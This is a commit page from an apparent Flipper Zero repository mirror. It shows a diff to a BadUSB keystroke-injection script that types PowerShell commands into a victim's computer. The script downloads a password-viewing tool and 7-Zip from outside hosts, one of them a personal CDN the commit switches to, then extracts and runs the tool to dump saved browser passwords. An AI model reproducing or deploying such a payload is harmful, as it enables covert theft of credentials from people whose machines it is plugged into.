mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Fixed an error with expanding the archive.
Upon expanding the archive originally, it would throw an error. Resolved this by repacking the archive and reuploading the files to my CDN. Feel free to check the checksum to verify the files are the same :D Here is a screenshot of the initial issue https://cdn.lullaby.cafe/img/Mv3hqPUcrh0VrMP.png
This commit is contained in:
parent
b03945da99
commit
dae2dd1b7b
@ -3,10 +3,12 @@ DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING wbpv28821@
|
||||
DELAY 1000
|
||||
STRING rmdir -R \temp
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
|
||||
ENTER
|
||||
STRING .\WebBrowserPassView.exe
|
||||
ENTER
|
||||
@ -31,4 +33,4 @@ ENTER
|
||||
STRING rmdir -R \temp
|
||||
ENTER
|
||||
STRING EXIT
|
||||
ENTER
|
||||
ENTER
|
||||
|
Loading…
Reference in New Issue
Block a user